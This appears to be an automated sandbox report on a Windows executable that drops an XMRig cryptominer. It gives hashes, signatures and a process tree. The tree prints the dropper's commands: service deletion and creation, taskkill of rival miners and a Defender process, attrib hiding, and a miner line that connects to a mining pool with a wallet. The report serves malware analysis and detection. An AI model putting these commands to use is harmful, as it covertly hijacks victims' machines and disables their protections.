Analysis

  • max time kernel
    148s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    20-05-2024 10:26

General

  • Target

    5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

  • Size

    1.3MB

  • MD5

    5e960ba61a82c5340650e2ce975bb4c9

  • SHA1

    300aced1503b54d91e5508f0a210330e91b71b8a

  • SHA256

    1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3

  • SHA512

    9143b2172a13f1d36380bd7dc9875d21c994b9aaed71b3d3a094de23ff58b3ec64adb166b727b1a41574447cd67e30ec8992278fa78d0f3f42928e576e5d1fa1

  • SSDEEP

    24576:jJlh9bDrRloua2E61y6ssIpCLpNwDfzhC8avIZej5O:jJp/FLrWpe8xChgZej5O

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Creates new service(s) 2 TTPs
  • Sets file to hidden 1 TTPs 4 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Drops file in Windows directory 16 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 15 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\sc.exe
        sc delete Systemss
        3⤵
        • Launches sc.exe
        PID:2620
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIserver
        3⤵
        • Launches sc.exe
        PID:2532
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMIservers
        3⤵
        • Launches sc.exe
        PID:2508
      • C:\Windows\SysWOW64\sc.exe
        sc delete WMI
        3⤵
        • Launches sc.exe
        PID:2388
      • C:\Windows\SysWOW64\sc.exe
        sc delete Serv
        3⤵
        • Launches sc.exe
        PID:2784
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_update
        3⤵
        • Launches sc.exe
        PID:2700
      • C:\Windows\SysWOW64\sc.exe
        sc delete system_updatea
        3⤵
        • Launches sc.exe
        PID:2416
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im spoolsvs.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im NsCpuapl.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2444
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im MSASCui.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2864
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nheqminer_zcash.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2040
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im nssm.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im update.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2440
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im server.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:356
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sppscv.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1792
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im taskhost.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1520
      • C:\Windows\SysWOW64\net.exe
        net stop wkde
        3⤵
          PID:1676
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop wkde
            4⤵
              PID:352
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 5 127.0.0.1
            3⤵
            • Runs ping.exe
            PID:804
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im mscorsvw.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1452
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im WUDFHost.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1020
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im nheqminer.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:848
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im NsCpuCNMiner32.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1128
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im NsCpuCNMiner64.exe /f
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1964
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 5 127.0.0.1
            3⤵
            • Runs ping.exe
            PID:2760
          • C:\Windows\SysWOW64\sc.exe
            sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
            3⤵
            • Launches sc.exe
            PID:2192
          • C:\Windows\SysWOW64\net.exe
            net start wkde
            3⤵
              PID:2180
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 start wkde
                4⤵
                  PID:1596
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
                3⤵
                • Sets file to hidden
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:584
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
                3⤵
                • Sets file to hidden
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:564
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
                3⤵
                • Sets file to hidden
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:2804
              • C:\Windows\SysWOW64\attrib.exe
                attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
                3⤵
                • Sets file to hidden
                • Drops file in Windows directory
                • Views/modifies file attributes
                PID:1404
          • C:\WINDOWS\Debug\wkde\mscorsvw.exe
            C:\WINDOWS\Debug\wkde\mscorsvw.exe
            1⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            PID:2164
            • C:\WINDOWS\Debug\wkde\svchost.exe
              C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
              2⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:444

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\WINDOWS\Debug\wkde\mscorsvw.ini

            Filesize

            397B

            MD5

            d298cd48c88433017ef4e66af740830e

            SHA1

            e0ef455dc4df16948d85c5a058d0980ce5020822

            SHA256

            b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89

            SHA512

            5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

          • C:\WINDOWS\Debug\wkde\mscorsvw.log

            Filesize

            244B

            MD5

            df296d0aa6eb740c57059aa9f47fd46c

            SHA1

            de668e0436d036c2608b3a16fbfaaf3cbfd52a59

            SHA256

            3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a

            SHA512

            db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5

          • C:\WINDOWS\Debug\wkde\svchost.exe

            Filesize

            687KB

            MD5

            79a1ec8d32e8e3032b5f5126c11f2216

            SHA1

            86dc55fcdc358a5c6699c41582b66b75bedc4086

            SHA256

            d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8

            SHA512

            a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

          • C:\Windows\debug\wkde\mscorsvw.exe

            Filesize

            684KB

            MD5

            cbb4ca806e69a4880dd02e04e5bce18b

            SHA1

            1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7

            SHA256

            2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b

            SHA512

            6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

          • C:\Windows\debug\wkde\wk.bat

            Filesize

            884B

            MD5

            816d97b2dca2af96209ef913291d59be

            SHA1

            a3c480a7e333a1623e7cd8194d68468397c3f6d1

            SHA256

            ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d

            SHA512

            54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

          • memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp

            Filesize

            724KB

          • memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp

            Filesize

            1.4MB

          • memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp

            Filesize

            1.4MB

          • memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp

            Filesize

            1.4MB